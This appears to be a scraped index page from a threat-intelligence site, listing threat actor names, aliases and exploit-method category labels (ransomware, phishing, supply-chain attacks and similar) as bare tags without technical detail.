Ransomware groups Ransomware Groups Rare Werewolf Razing Ursa Red Menshen Red Team RedDragon Redfly group Redline RedLine REvil Rhysida Rhysida Ransomware Rhysida Ransomware gang RipperSec Robbinhood Ransomware Operators Rocke Rogue nation-state RootSc3pis Royal Russia Russia-linked APT Russia-linked APT actor Russia-nexus advanced persistent threat (APT) actor Russia-nexus advanced persistent threat (APT) group Russia-nexus APT actor Russian developers Russian hackers Russian state interests Russian state-sponsored hacking groups Russian-backed APT actor Russian-speaking cybercriminals Russian-speaking individual Russian-speaking threat actor Russians Salt Typhoon Salt Typhoon APT Samedit_MaraisakaBaronSamedit Sandworm Scammers Scanner ScarCruft Scarlet Goldfinch Scattered Spider SCATTERED SPIDER Security Service of Ukraine (SSU) Serbian Security Information Agency (BIA) Shengsheng He ShinyHunters ShroudedSnooper SideWinder APT Silent Ransom Silent Ransomware Group (SRG) Silent Werewolf SIM swappers Sina Gholinejad SolarWinds sophisticated nation state actor Sophisticated nation state actor Starchy Taurus Stargazer Goblin Stark Industries Solutions State-sponsored attackers State-sponsored groups StealC Storm-0408 Storm-1575 Storm-2035 Storm-2372 StormBamboo Stormous Strontium Sysdig-Observed-Actor TA450 TaskUs Employees (Coinbase Data Breach) Tavis Ormandy Telegram API Redirector The Com Threat actor behind RubyGems attacks Threat actor responsible for React Native Aria and rand-user-agent compromises Threat actors behind the phishing Threat Operator Triada Actors Trickbot Turla Turla APT UAC-0006 UAC-0063 Ukrainian National Unauthorized actor UNC3886 UNC3944 UNC4841 UNC5174 UNC5221 UNC6040 Underground Forum Exploit Sellers Unknown Unknown APT Actor Unknown Attacker(s) from Poland Unnamed credential stuffing actor Valentin Lobstein Variston Velvet Ant Velvet Chollima VexTrio Vidar Vile ViLE Vishing threat actors Vitaly Nikolaevich Kovalev Vladimir Viktorovich 
Kvitko Volt Typhoon WannaCry group Winnti Winter Vivern WormGPT WormGPT Creators xz-utils attackers Yandex Yicheng Zhang
Actor Aliases All @crypto-exploit @sw1zzx_dev @ThePureBot 764 Agonizing Serpens Alex Konor Ali888Z alinchok ALPHV AMOS (Atomic macOS Stealer) Anon Anonymous 64 anupm019@gmail.com anupm019@gmail[.]com AppleProcessHub Stealer APT-C-01 APT-C-08 APT-C-62 APT-C-64 APT-C-65 APT-C-67 APT-Q-37 APT10 APT15 APT29 APT34 APT43 APT44 APT5 AVCheck BADBOX Badbox 2.0 BADBOX 2.0 Barium BARIUM BeiDou ben Ben Bentley Bergen BianLian BidenCash BidenCash Administrators Bl00dy Black Owl BlackCat/AlphV BlackTech BloodyAD bloodzz.fenix Blue Athena BlueBravo BlueDelta Bronze Fleetwood Bronze Vapor Bùi nam buidanhnam Callisto Group Canary Typhoon cappership Charming Kitten Chatloader Chatty Spider Chinese government-linked hacking group Chinyong Chocapikk Circuit Panda CL-STA-0048 ClickFix Cloaked Ursa ColdRiver COLDRIVER APT Contagious Interview Convict Cozy Bear COZY BEAR CrackMapExec Crocodilus Crypt.guru Cryptor.biz CurveBack Cyber Army of Russia Cyber Army of Russia Reborn Cyber Av3ngers cyberbaddies Cybercriminals CyberLock CyberLock ransomware DadSec Daggerfly DarkMeta Deadglyph Deep Panda Defender dendimirror Desnake DevPopper Diamond Sleet DodgeBox DollyWay World Domination Campaign Earth Krahang Earth Lusca EDDIESTEALER Eleven11bot ePKI EUROPIUM Evasive Panda Facebook FakeUpdates Fancy Bear Fang Neng CDN Fighting Ursa FIN7 Flax Typhoon Flea FoxBlade FraudGPT FROZENLAKE Funnull Technology Inc. 
Gelsemium ghackihg Ghost Security GhostSecMafia Gleaming Pisces GRU Unit 29155 GSM h00die-gr3y Hazel Sandstorm Hazy Tiger Helgoland Bite HermeticWiper HEXANE Hexon Hidden Cobra HiPKI Hoody Hyena Hunters im_ad__213 INC Ransomware Instagram Iridium Iron Hemlock Iron Twilight ischhfd83 Ivan Neculiti Jinyong IT Cooperation Company Karake Katz Stealer KE3CHANG Keyhole Panda KEYHOLE PANDA Kill Security KillDisk Kim Jong Un Kim Sang Man Konni Konni APT Laundry Bear Laundy Bear Leet Librarian Ghouls Lifting Zmiy LILACSQUID Liu Lizhi LockBit Lucca Corgiat Lucky_Gh0$t Lumma Stealer LummaC2 Luna Moth Lyceum LZRD Mirai makc1901 Manganese Mango Media 2 Rise META Meta Pixel Midnight Blizzard MoonWalk Muck Muddling Meerkat navi_ghacking NEARMISS neon Neon Pothos NetExec Nickel Nobelium NodeSnake NoName057(16) North Korean technical workers Numero Nylon Typhoon Octo Tempest Odah Al-Suhaimat Odah Suhaimat odahodah Often9 OilRig Ominous Opal Sleet Operator Panda Orange Yali OSMIUM Palmerworm Pasker PathWiper Pawn Storm Pen Tester Phantom Circuit Phantom Mantis Phoenix Planedown Playboy ransomware Playcrypt Playful Dragon Playful Taurus Poison Vine Professor PulsePack PureCrypter PureLogs PureRAT PurpleHaze Python3127 PATH Hijack Qilin RapeFlake Rare Werewolf Rare Wolf Red Teamers Redfly group RedLine Infostealer REF0657 Resbot Resentual Rezet Rhysida Rhysida ransomware gang rKe3Chang Royal APT Russia-linked threat actor Ryan Ryan Cleary Salt Typhoon Sandworm Sandworm APT Sapphire Sleet ScarCruft Scattered Spider ScopeCreep Seashell Blizzard Secret Blizzard Sednit ShadowPad SharpSuccessor ShinyHunters Shrouded Crossbow si_mobile Sim Hyon Sop Simple DNS Rebinding Service Sina Ghaaf Singularity of Origin Sneer Review SocGholish Sofacy Spiderweb STAC6451 Star Blizzard StealthVector Stern Storm-0133 StripedFly Strontium SVR sw1zzx T-APT-17 TA397 TA422 TA450 Tabbywalk Target TeleBots The Com The Dukes The Manipulators THORIUM Threat actors ToddyCat APT TraderTraitor Travel Intelligence 
Program (TIP) Triad Nexus TrickBot Tumbleweed Typhoon Turla UAC-0006 UAC-0099 UAC-0125 Uchiha UchihaLS Uetus UNC1860 UNC2452 UNC2630 UNC3753 UNC3886 UNC3944 UNC4841 UNC5174 UNC5221 unheard44 Unknown Ursa Uteus VAGue Focus Veaty Viola Tricolor vision Vixen Panda VIXEN PANDA Volt Typhoon Voodoo Bear VOODOO BEAR Weep Whisper Wicked Panda Wicked Spider Winnti WinntiGroup Winter Vivern Wizard Spider WormGPT Yandex Browser Yandex Maps Yandex Metrica Yuri Neculiti Zeekill Zerolot ОДА СУХИМАТЬ
Exploit Method All ABAP_Vulnerabilities Abuse of Cloud Provider Infrastructure Abuse of Windows Defender Control to Disable Security Measures Abusing Client-Side Extensions (CSE) in Active Directory Abusing swap files in e-skimming attacks on Magento sites Abusing Ubuntu 'command-not-found' utility to install malicious packages Abusing Windows Container Isolation Framework to avoid detection by security products Accessibility Service Abuse for Cryptocurrency Seed Phrase Theft Accessibility Service Abuse in Android Account Compromise via Credential Theft/Phishing/Malware Account Farm for Creating Fake Accounts Account Recovery Phone Number Brute-Force Account Takeover Account Takeover (ATO) AcidRain Acreed Infostealer Active Exploitation of CVE-2025-5419 Active Exploitation of KEV Catalog Vulnerabilities Active Exploitation of Known Vulnerabilities Active Exploitation of Zyxel CPE Series Devices Zero-Day Admin Account Hijacking and Persistence Admin Security Failures Admin Takeover via 'Motors' Theme Vulnerability Adreno GPU Driver Memory Corruption Exploit Agentic AI Accelerated Ransomware Attack Simulation AI Agent Credential Harvesting AI Agents as Attack Vectors AI Alert Fatigue AI Cybersecurity Guideline Reduction AI Hallucination Leading to False Attack Signals AI Hallucination Leading to Introduction of Risk AI Hallucinations in SecOps AI Installer Malware AI Misinformation AI Model Collapse AI Model Manipulation by Authorized Users AI-Assisted Code Generation for Malicious Purposes AI-Assisted Insecure Code Deployment AI-Driven Windows and Office Automation AI-Enabled Phishing and Deepfakes AI-Generated Code Vulnerabilities AI-Generated Profile Photos AI-powered Phishing AI-Powered Phishing AI-Powered Phishing and Password Breaches AI-powered Phishing Scam via Deepfake Newscast AI-Powered Threats AI-Powered Vulnerability Discovery AirBorne flaws AiTM Phishing Kits (Evilginx) AMSI Bypass and Data Anomalies and Model Tricking in AI Anti-Satellite (ASAT) 
Weapons against Space-Based Interceptor System API Overload Application Freezing/Unresponsiveness Application-Layer Attacks with AI Auto-Remediation Application-Layer DDoS Attacks APT41 Google Calendar C2 Arbitrary Code Execution via Cargo Commands on Untrusted Projects Arbitrary Code Execution via Drive-By Compromise Arbitrary File Deletion via Junction Abuse Arbitrary File Upload and Remote Code Execution via Hardcoded JWT Arbitrary Intent Injection AsyncRAT Infection via Fake Booking.com Attackers are exploiting recently disclosed OttoKit WordPress plugin flaw Attackers chained Craft CMS zero-days attacks in the wild Attackers chaining Next.js flaw Authentication Bypass Authentication Bypass leading to RCE Authentication Bypass via Brute-force Authentication Bypass via machineAccountCheck AUTHENTICATION_BYPASS_THEN_RCE_INFO_DISC_FILE_DELETION AVTECH Camera Zero-day Exploitation Azimuth Security's iPhone unlock Azure OpenAI DNS Misconfiguration Leading to MitM and Data Leak Backdoor in Contec CMS8000 / Epsimed MN-120 Backdoor Injection via Fake Security Tool Plugin Backdoor Installation and Persistence Backdoor Installation in NVRAM Backdoored Game Cheats Backdoored GitHub Repositories Backdoored Malware Deployment Backdoored Open Source Malware Repositories Backdoored pirated applications targeting Apple macOS users Backdoors BadBox 2 Botnet BADBOX 2.0 Badbox 2.0 Botnet BADBOX 2.0 Botnet Badbox 2.0 Botnet Infection BADBOX 2.0 Malware as Residential Proxy BadSuccessor Exploitation via dMSA Abuse Bagle worm Bankurt Trojan Remote Control Bitcoin Mixing BitLocker Recovery Loop BitM Attack using Fullscreen API (Safari) Black Basta and Bl00dy ransomware group exploitation of CVE-2024-1709 and CVE-2024-1708 BLASTPASS BLE Authentication Bypass via Uninitialized Variable Block Windows Updates via Junction Point Bogus NFT Airdrops on Hashgraph Booking.com Reservation Abuse BPFDoor Backdoor Breaking into opponent's computer systems bring your own installer (BYOI) Broken 
Authentication in APIs Broken SIEM Rules Broken Windows Update Leading to Recovery Mode Brute-Force Attack on Google Account Recovery Brute-force attack on weak passwords Brute-Force Login and Authentication Bypass Brute-Force Login Attack Buffer Overflow Buggy Security Update Leading to System Crashes Bulk Purchase of IP Addresses Business Logic Attacks (BOLA) BYO ISO Persistence BYOVD Bypassing Android 13 Accessibility Restrictions with Session-Based Package Installers Bypassing User Account Control (UAC) Cashing out in small distributed quantities Cellebrite Exploitation Censorship of Information Certificate Abuse Certificate Trust Revocation Chained Weaknesses Exploit Chaining Vulnerabilities for Lateral Movement and Pivoting Chaos Ransomware Attack Chaos RAT ChatGPT_o3_shutdown_bypass China-linked APT Salt Typhoon compromised US broadband providers and breached wiretap systems China-linked APT uses Cisco Router Flaws ChoiceJacking Chrome Sandbox Escape via Malicious File (CVE-2025-2783) Circumvention of Age Verification via Alternative Sources Cisco Smart Licensing Utility flaws exploited in the wild CitrixBleed Exploit ClickFix ClickFix Attacks ClickFix Social Engineering Clipboard Hijacking and PowerShell Command Execution Clipboard Poisoning Cloud Misconfiguration Cloud Misconfigurations and Insecure APIs Cloud Permission Mismanagement / Least Privilege Violation CloudTrail Logging Evasion via IAM Policy Size Differences Cobalt Strike Penetration Testing Tool Code Injection via Gecko Bootloader Firmware Update Codebase Destruction via Malicious npm Package COM Object Instantiation for Arbitrary Code Execution Command Chaining via Macro Pads Command Injection via POST Data Compromised Accounts for Cryptocurrency Mining Compromised AWS Credentials via Misconfigured S3 Bucket Compromised Booking System Compromised Container Leading to Crypto Mining via Docker CLI Installation Compromised Credential Exploitation Compromised Credentials via Phishing Compromised 
Credentials via Third-Party Contractors Compromised Credit Card Data Sales Compromised Dependencies Compromised Dormant Business Accounts Compromised Email Account Setup and Usage Compromised Endpoint Administration Framework Compromised Google Play Developer Accounts Compromised Identity Systems Exploit Compromised Login Credentials (SSH) Compromised Microsoft Exchange Webmail Account Exploit Compromised ScreenConnect instances Compromised Snowflake Credentials leading to Data Exfiltration Compromising Video Surveillance Devices Compulsory Legal Process Compromise Concurrency Bugs/Memory Leaks Consul Health Check Abuse Consul Misconfiguration Exploitation Consul Remote Code Execution via Malicious Checks Contact List Manipulation for Social Engineering Conti Ransomware Deployment Cookie Theft for Account Access Coordinated Phishing using Generative AI Copyright Infringement via Content Reproduction Corporate Espionage/Infiltration Courthouse Raids Exploiting Policy Changes Covert Channel Tunneling via Azure Blob Storage (ProxyBlob) CPS Targeting Craft CMS zero-day chaining Crafted HTML Page for Heap Corruption crafted_packets_dos_and_information_leak Credential Dumping Credential Dumping via Mimikatz Credential Harvesting Credential Harvesting via Fake WordPress Caching Plugin Credential Harvesting via Malicious PyPI Package Credential Harvesting via Phishing Credential Leaks in Public GitHub Repositories Credential Stuffing Credential Stuffing (23andMe Breach) Credential Stuffing Attack Credential Stuffing/Password Cracking Credential Stuffing/Phishing leading to Fraudulent Claims Credential Stuffing/Unauthorized Access Credential Theft (Valid Accounts / No MFA) Credential Theft (via Social Engineering) Credential Theft and Abuse Credential Theft and Known Flaw Exploitation (Play Ransomware) Credential Theft and Unauthorized Access Credential Theft via Spear Phishing Using CVE-2024-42009 Credential Theft via Trojan Stealers Crocodilus Android Banking Trojan 
Crontab Persistence Cross-domain attacks Cross-Platform System Deletion via Backdoor (system-health-sync-api) Cross-Site Data Collection CrushFTP CVE-2025-2825 flaw actively exploited Crypto Malware (Wallet Draining) Crypto Theft Cryptocurrency Laundering Cryptocurrency Money Laundering Cryptocurrency Wallet Draining via Malicious npm Packages Cryptojacking via Breached Hosting Accounts Custom CSE Backdoor via GPO Manipulation CVE-2025-49113 Exploit Cyber Attacks on Military Networks Cyber Toufan Weak Credentials Cyberattack leading to system shutdown and operational disruption CyberLock Ransomware Data Breach and Repackaging Data Breach Leading to Account Takeovers and Identity Theft Data Breach via Third-Party SAP Service Provider Data Breach via Unauthorized System Access Data Broker Surveillance Data Decryption Data Exfiltration Data Exfiltration and Website Defacement Data Exfiltration Using Living Off The Land (LOTL) Data Exfiltration via Cookie Theft Data Exfiltration via Copy-Pasting into Chat/AI Data exfiltration via encrypted channels Data Exfiltration via Malicious Browser Extensions Data Exfiltration via PowerShell Script with 7-Zip Archiving Data Exfiltration via Typosquatting Packages Data Exfiltration via Unapproved SaaS Applications Data Exposure due to Multi-Tenancy Data Leak from TrickBot and Conti Data Leakage Data Loss Prevention (DLP) Evasion Data Poisoning Data Privacy Violations by Cloud-Served LLMs Data Re-identification in Synthetic Data Data Theft via Bribed Insiders (Coinbase Breach) DCM File Parsing Out-Of-Bounds Write Remote Code Execution DDoS Attack DDoS via Botnets Deepfake Creation and Distribution Deepfake Enabled Phishing Deepfake Scams using Generative AI Deepfake Voice Phishing Deepfake-enabled Social Engineering Deepfakes Default Enabled Screen Recording in T-Life App Dependency Confusion Device Code Phishing Digital Identity Theft Directory Traversal Arbitrary File Deletion Dirty Pagetable Technique Disabling or jamming remote 
equipment (like drones) Disgruntled Employee Insider Threat Distribution via Bogus Facebook Ads DLL side-loading DLL Side-loading with PULSEPACK DLL Sideloading DLL Unhooking dMSA Privilege Escalation DNS Hijacking DNS Poisoning/Cache Poisoning DNS Rebinding DNS Spoofing/Abuse DNS Tunneling Exploit DNS-Based Attacks Docker API Misconfiguration Docker Engine API Misconfiguration Exploitation doExecute Command Injection Domain Controller Hijacking via VMDK Mounting Domain Generation Algorithm (DGA) Abuse Domain Generation Algorithm (DGA) and Infrastructure Laundering Dormant Account Exploitation Dormant User Accounts Double Extortion DragonForce Ransomware DragonForce Ransomware via SimpleHelp RMM Earth Lamia SAP NetWeaver Exploitation EDDIESTEALER EDDIESTEALER's Bypass of Chromium's App-Bound Encryption Endpoint Administration Framework Abuse for Malware Deployment Entitlement Fraud via Digital Identities Entitlement Fraud via Digital IDs Evilginx Phishing Framework EvilProxy Campaign Excessive Agency Exploit of unix_chkpwd process Exploitation of Complex Network Segmentation Exploitation of Edge Device Vulnerabilities Exploitation of Familiar Templates/Knowledge Exploitation of Insider Risk During Employee Offboarding Exploitation of Internet-Facing Applications (BladedFeline) Exploitation of Legacy Vulnerabilities in OT Systems Exploitation of Old/Reused Credentials Exploitation of Public-Facing Application for Initial Access Exploitation of unpatched software and old applications Exploitation via Publicly Accessible Groups Exploiting Misconfigurations Exploiting outdated software exposed services Exposed Vulnerabilities due to Failing Defenses Exposure of Management Interfaces Facial Recognition Bans Factory Reset Exploit Fake AI Installer Malware Distribution Fake CAPTCHA to Evade Static Scanners Fake Zoom Client Downloader Leading to Remote Access Fast-Flux Hosting File Integrity Monitoring Bypass FinalDraft Backdoor Firebase and Google Apps Script Hosting of 
Phishing Pages Flog Web Shell Deployment Fortinet Authentication Bypass and Remote Code Execution Fortinet FortiVoice Zero-Day Exploit Fraud rings exploiting insecure services Fraudulent Contract Manipulation by Partner Agencies Fraudulent Identity and Due Diligence Bypass Fraudulent Tax Return Filing Funnull Infrastructure Abuse Funnull Technology Inc. Infrastructure Abuse Funnull Technology IP Address Abuse Gaining Valid Credentials via Inadequate Password Policies Generative AI Assisted Phishing/Scam Operations Generic Weakness Exploitation getServerCertificate Command Injection getServerPayload Directory Traversal GhostSpy Gitea Remote Code Execution via Git Hooks/Install Lock Gitea Unlocked Installer Exploitation Gladinet flaw actively exploited Glitch Platform Abuse for Phishing Google Account Phone Number Brute-Force Google Account Phone Number Brute-Forcing via Legacy Username Recovery Form Google Calendar C2 Google Calendar Command and Control Google Calendar Exploit by APT41 GOREshell Backdoor GOREshell Backdoor Deployment via Zero-Day Exploits GPS Jamming GPS Spoofing GPT-4 Exploit Generation GUID Hijacking Hands-on-Keyboard Activity Haozi Phishing-as-a-Service Hard-coded API Keys and Secrets Hardcoded API Keys and Secrets Hardcoded Credentials and Backdoor for System Wipe Hashtag Manipulation for Increased Visibility Heap_Corruption_via_crafted_HTML_page_CVE-2025-5419 Heap-based Buffer Overflow in tuya_svc_devos_activate_result_parse Hedera Hashgraph NFT Airdrop Scam Help Desk Scams HermeticWiper Hexon/Leet Stealer Malware Distribution High-Volume Hijacking of SolarView Compact devices for bank account theft Hook Android Banking Trojan Source Code Leak HPE StoreOnce Remote Code Execution via Chained Vulnerabilities HTML Conditional Statement Abuse for Phishing HTTP Header Manipulation Hugging Face Spaces Abuse Human Error ICO_File_Parsing_Integer_Overflow_RCE Identity and Access Management (IAM) Attack Surface Identity-based attacks Identity-Based 
Exposure Identity-Centric Attacks by Nation-States iDRAC Vulnerability IIS Folder Exploit IMEI Blacklist Circumvention/Exploitation iMessage Nickname Update Zero-Click Exploit iMessage Zero-Click Attacks Suspected in Targeting of High-Value Individuals Impacket abuse Improper Redaction of Personally Identifiable Information in Anonymous Email Inconsistent Threat Group Naming Incorrect Folder Permissions Privilege Escalation Indirect Phrasing Evasion Information Stealing via Malicious AI SDK Packages Information-stealing malware Initial Access via Legitimate Endpoint Administration Tool Insecure Code Generation by AI Coding Tools Insecure Communication of Sensitive Defense Information Insecure Mobile Access (Public Wi-Fi) Insider Access Exploitation (ViLE Group) Insider Threat Exploit Insider Threat Exploitation Interlock Ransomware Interlock Ransomware Attack Interlock Ransomware Double Extortion iOS and Android Jailbreaking/Exploitation using Corellium Virtualization IoT Security Downgrade IP Address Hijacking for Malicious Proxy Services iPhone Zero-Click Exploit IPhone Zero-Click iMessage Exploit Ivanti Cloud Vulnerability Chain (CVE-2024-8963 & CVE-2024-8190) Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution Ivanti EPMM flaws exploited by UNC5221 Juice Jacking Katz Stealer Katz Stealer's Circumvention of Chrome's App-Bound Encryption Kinetic Projectile Weapon Misuse Known Vulnerability Exploitation KNOWN_EXPLOIT_USE Kubernetes API Brute-Force and API Vulnerability Exploitation Lack of 2-Step Verification (2FA) Lack of Data Governance in AI Systems Lack of Effective Age Verification Lack of Explainability and Auditing in AI Tools Lack of Formalized Incident Response Plan Lack of Security Awareness Among Developers Lack of SMB Cyber-Resilience Lateral Movement Lateral Movement and Data Exfiltration via Over-Permissioned NHIs Lateral Movement via Compromised App-to-App Connections LD_PRELOAD hijacking Least Privilege Violation Legacy 
Driver Abuse (Check Point Research) Legitimate Tool Abuse Leveraging Leaked Ransomware Builders (LockBit 3.0) Leveraging Legitimate Software for Malicious Purposes License Plate Reader Surveillance Lithium-ion Battery Thermal Runaway Living Off The Land (LOTL) Data Exfiltration Living off the Land with ScreenConnect LLM Jailbreaking LNK_File_Exploit Local Storage via microSD Card Localhost Port Eavesdropping for Data Linking Log Manipulation Logic Bombs Lookalike Domain Loss of CCTV Footage LOTS/LOLBins Exploitation (Calendarwalk) Low-Complexity Task Exploitation Lucky_Gh0$t Ransomware Lumma Infostealer Distribution Lumma Infostealer Persistence Lumma Stealer (LummaC2) Lumma Stealer Distribution Tactics macOS Shell Script Execution Malicious AI Code and Libraries from Prompt Injections Malicious App Distribution (Unofficial Marketplaces) Malicious Applications and Firmware Updates Malicious Apps on Google Play Malicious Browser Extension Installation via Policy Modification Malicious Browser Extensions Malicious Cables Malicious Code Generation via AI Prompting Malicious Code in Test Code Malicious Code Injection into Developer Code Repository Malicious Code Injection/Modification Malicious Domain Spoofing Malicious Driver Exploitation Malicious Go Modules Malicious Insider Attack Malicious JavaScript Injection (Polyfill Scandal) Malicious NPM Packages Disguised as Express Utilities Allow Attackers to Wipe Systems Malicious Package Injection into Open-Source Repositories Malicious Payload in Updates Malicious Repository Distribution Malicious Salesforce Connected App (Modified Data Loader) Malicious Web Traffic Analysis and Replay Malware Bundling/Trojan Horse Malware Delivery via Fake AI Video Generators Malware Evasion using AVCheck and Crypting Services Malware Evasion via Counter Antivirus Services Malware Exploitation via API Mimicry Malware Generation via AI Tools Malware Obfuscation and Evasion using Crypting Services Malware-Enabled Cookie Theft 
Malware-free intrusions Malware-free Intrusions Man-in-the-Middle (MITM) via Unencrypted Password Sharing Man-in-the-Middle Attack Management Card Authentication Bypass Mass exploitation campaign Material Support for Terrorism MCU Command Parsing Misinterpretation Medusa Medusa ransomware and ABYSSWORKER Meta Pixel SDP Munging MFA Bypass via Social Engineering MFA Fatigue (Push Bombing) Microsoft Teams attack via Black Basta Microsoft Windows NTLM flaws Mirai Botnet Mirai Botnet Exploit of Wazuh CVE-2025-24016 Mirai Botnet Infection via Shell Script Mirai Botnet Variant Mirai Botnets Exploiting Wazuh Security Platform Vulnerability Mis-issued certificates leading to bypass warnings Misconfiguration Exploitation Misconfigurations Misconfigured AWS Landing Zone Misconfigured Docker Engine API Misinformation and Amplification of Conspiracy Theories Misuse of Sanctions against Political Opponents MitM Attack via Insufficient SSH Host Key Validation (CVE-2025-20163) MITRE ATT&CK Coverage Gaps Mnemonic Phrase Harvesting via Fake Crypto Wallet Apps Mobile Device Exploitation via Cellebrite UFED Modified Salesforce Data Loader Morphing Meerkat Multi-Vector DDoS Attacks with Systematic Probing and Adaptive Tactics Multiple Palo Alto Networks firewalls hacked Nation-State Hacking Campaigns NetBird Deployment via Multi-Stage Phishing Network Device Exploitation (Check Point, Fortinet, SonicWall, CrushFTP) Network Flooding Network Intrusion Leading to System Shutdown Network/System Intrusion and Data Exfiltration New AyySSHush botnet using ASUS routers New ReaderUpdate malware variants target macOS users NFC Relay Attack using NFCGate NICKNAME Nimbo-C2 Remote Access Framework NodeSnake RAT NodeSnake RAT Deployment Nomad Insecure Server Exploitation Nomad Job Queue Abuse Nomad Misconfiguration Exploitation North Korean Fake IT Worker Scheme NotPetya Malware NotPetya Ransomware NoviSpy Deployment via Cellebrite NPM Supply Chain Attack via Package Compromise NtManageHotPatch API 
Patching for Process Hollowing Numero Malware OAuth Permission Abuse by Generative AI Applications Open WebUI Misconfiguration - Arbitrary Command Execution OpenAI O3 Shutdown Subversion Operation on the Clear Web or open ports OttoKit WordPress Plugin Admin Account Injection Out-of-bounds Read and Write in V8 JavaScript Engine Over-Privileged NHIs Overlay Attacks to Harvest Credentials Overwhelming Missile Attack (Arms Race Escalation) Overwriting Configuration File and Triggering Service Restart OWASP Top 10 API Threats Password Database Theft (1Password Example) Password Reuse Password Stuffing Attack Patch Tuesday Path Traversal Path Traversal via Web Honeypot URL PathWiper PathWiper Data Destruction PathWiper Deployment via Compromised Endpoint Administration Framework PayDay Loader PayU CommercePro Account Hijacking Peachpit Ad Fraud Module Phishing Phishing and Social Engineering Phishing and Social Engineering (Pig Butchering) Phishing Attacks Phishing Automation Phishing Campaign Leading to Remote Access Software Deployment Phishing Campaign to Deliver Malicious Archives Phishing Code Smuggling in SVG Images Phishing Distribution of Chaos RAT Phishing Emails Phishing for Gaming and Streaming Accounts Phishing for Initial Access Phishing Simulations and Social Engineering Attacks Phishing via Compromised Booking Platform Messaging Phishing Vulnerability Phishing with LNK files Phishing/Social Engineering Phone Call Impersonation PHP Object Deserialization Leading to RCE via CVE-2025-49113 PHP Object Deserialization via _from parameter PHP Reflection Method Access Pig Butchering Scam Pig Butchering/Romance Baiting PIN Code Exfiltration via Content Provider Plaintext Transmission of Sensitive Data via HTTP Play Ransomware Play Ransomware Double Extortion Play ransomware zero-day exploitation Plugin Abuse Plugin/Theme Vulnerability Exploitation for Redirects PNG Data After IEND PNG File Appending Port Knocking and Magic Bytes in SSH Traffic Post-Quantum 
Cryptography (PQC) cracking current cryptographic algorithms; PowerShell One-Liner Download; PowerShell Script Execution via Social Engineering; PreBuild Event Backdoor; Preloaded Malware; PrimeCache IIS Module Backdoor; PrimeCache Malicious IIS Module; Privacy Breach via Data Retention; Privilege escalation; Privilege Escalation; Privilege Escalation via Forgotten Admin Access; Privilege_Escalation_and_Backdoor_Installation; Privileged Account Abuse; Privileged Container Exploitation; Process Hollowing; Process Injection; processAttachmentDataStream Directory Traversal Remote Code Execution; Prompt Engineering Attacks on Agentic AI; Prompt Injection; Prompt Injection and Manipulation; ProxyBlob - Reverse SOCKS5 Proxy via Azure Blob Storage; ProxyLogon; ProxyShell; Psychological Manipulation via Phone Calls; PulsePack Backdoor; Pwn2Own demonstrated exploits; Python RAT Execution; Qilin Ransomware Deployment via FortiGate Vulnerabilities; Quantum Computing Breaking Traditional Encryption; queryHardwareReportLocally Command Injection; Ransomware; Ransomware Attack; Ransomware Attack and Data Exfiltration; Ransomware Attack by Interlock; Ransomware Attacks; Ransomware Double and Hybrid Extortion; Ransomware Groups Leveraging Unfulfilled SEC Disclosure Requirements; Ransomware-as-a-Service (Playboy Ransomware); Ransomware-as-a-Service (RaaS) Affiliation; Ransomware-as-a-Service (RaaS) model adoption; React Native Aria Packages Backdoored in Supply Chain Attack; Recompiled Ransomware Binaries; RedLine Information Stealer Malware; RedLine Infostealer Malware; RedLine Stealer; Reduced Attack Surface; Registry Key Dumping to Steal Credentials; Remote Access Trojan (RAT) Functionality; Remote Access Trojans (RATs) Deployment; Remote Code Execution via Crafted Software Image Upload; Remote Code Execution via Require(); Remote Data Wipe via Hidden Endpoint (express-api-sync); Remote Data Wipe via Multiple Endpoints (system-health-sync-api); Remote Desktop Freeze Exploit; Remote Fire Panel Control via Default Account; Remote Fire Panel Control via Hardcoded VNC Password;
Replay Attack Bypassing Deepfake Detection; Residential Proxy Abuse; Reverse Engineering; RFA_File_Parsing_Use_After_Free; RFID skimming; Right-to-Left Override (RLO) Filename Spoofing; RoamingMOUSE Anel Backdoor; Robbinhood Ransomware Attack; Rogue devices in Chinese-made power inverters; Rogue VM Creation; Role Playing Evasion; RolesAnywhere_Default_Configuration_Exploit; RolesAnywhere_Privilege_Escalation; Romano's PoC Exploit; Romano's vBulletin Exploit; Root Privilege Escalation; Roundcube RCE via PHP Object Deserialization; Row Level Security (RLS) Policy Misalignment in "Vibe Coded" Apps; Rules File Backdoor; Rules File Backdoor: AI Code Editors exploited for silent supply chain attack; Sakura RAT; Sakura RAT Backdoor; Salesforce Connect Setup Page Code Injection via Social Engineering; Salesforce Data Exfiltration via Malicious Data Loader; Salesforce Data Theft via Fake IT Support Calls; Salt Typhoon; Salt Typhoon attacks on US telcos; Salt Typhoon breach of telecommunications companies; Sandworm Cyberattack on Ukrainian Power Grid; SAP NetWeaver flaw exploitation; SBA Economic Injury Disaster Loan Fraud; Scams targeting young gamers through in-game offers; Scattered Spider Attacks; Scheduled Task Abuse for Persistence and Covert Operations; Scheduled Task Abuse for Remote Access; ScopeCreep Malware Development; ScreenConnect_PLC_Hijack; Search Hijacking; Secret Leakage; SELinux Bypass; SEO Poisoning; SEO Poisoning leading to Malware Deployment; Server-Side Request Forgery (SSRF) via determineInclusionAndExtract method; Service Desk Number Spoofing; setLocateBeaconOnHardware Command Injection; Setting AnyDesk Password for Unattended Access; Sextortion Scams; Shadow AI Applications; Shadow AI Data Leakage; Shadow IT; Shadow IT Exploitation; ShadowPad Backdoor Deployment; ShadowPad Malware; ShadowPad Malware Delivery via PowerShell with Sandbox Evasion; ShadowPad with ScatterBrain obfuscation; Shahmaran Backdoor; Shared Cloud Credentials Exploitation (CVE-2025-20286); Ship Monday;
Signal Jamming; Signal Jamming of Drones; Silent Ransom Exploit; Silent Ransomware Group (SRG) Tech Support Scam; SIM Swapping; SIM Swapping for 2FA Bypass; SIM Swapping to Bypass SMS-based MFA; SimpleHelp flaws chained by DragonForce; SimpleHelp Remote Code Execution; SimpleHelp RMM Software flaws for initial access; Single Bug Root Exploit (Pixel 6 Pro); Sneaky 2FA; Snowflake Customer Data Breach; Social Engineering; Social Engineering (FOMO Exploitation); Social Engineering Attacks and Scams; Social Engineering Domain Registrars; Social Engineering for Fake Job Applications; Social Engineering via Email; Social Engineering via Malicious Salesforce App; Social Engineering via Phone Calls; Social Engineering via Vishing to install malicious Connected App; Software Supply Chain Attack; Solana Private Key Theft via Monkey Patching; SolarWinds Hack; Spam Harvesting via Fake Email Addresses; Spear-Phishing; Spear-Phishing Attacks Targeting Access Tokens; SQL Injection; SSH Access via compromised public key; SSH Backdoor on Port 53282; SSH Backdoor using OpenSSH; SSH Backdoor via Trojanized Putty; SSH Brute-Force against PumaBot; 